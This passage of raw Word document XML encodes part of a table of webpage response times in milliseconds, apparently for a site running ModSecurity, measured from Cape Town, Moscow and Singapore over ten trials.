              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC2C4D6"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5289</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="19DCD120" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E8E6B13" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AEA66C"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254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F335414"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981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F2D4AC0"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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5799662A"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32F13EDD"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6C056373"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25C51157"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1436F313"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1B17E9C9"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7F707B3D"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1934CE58" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="0B86EAE8" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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74F7338"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ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11660" w:type="dxa"/>
            <w:gridSpan w:val="11"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0406D5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Webpage Response (ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="0F3CCC16" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51EE6B5F"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City, Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4299F1FB"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26E4F530"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="389F0575"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A13D3C"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FB6F793"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79446E88"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51515715"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3886AE40"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21D79D20"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67B3A03A"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7116B579"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Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="10595437" w14:textId="77777777" w:rsidTr="001C3F72">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2A6E157A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cape Town, South Africa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C3AA69C"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1106</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51169ED7"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687</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BD874B8"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680</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A02B625"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742</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05129AA9"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683</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35C40A7B"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680</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD2D64B"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678</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F73CB44"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683</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1849EF9C"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677</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6779E98B"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765</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B016A56"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7381</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="1388B5CC" w14:textId="77777777" w:rsidTr="001C3F72">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4E0075D5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Moscow, Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02B53A88"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510</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D933830"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470</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13DF7FE8"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1499</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003A9212"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524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62026526"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476</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10EF4DE2"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462</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="478B8841"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465</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EF70572"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461</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7598CC77"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477</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E8DA36"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467</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D07E929"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5811</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="4D112E3F" w14:textId="77777777" w:rsidTr="001C3F72">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7EB30CCD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Singapore, Singapore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35FF0F6E"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623</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14FFCBA6"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455</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
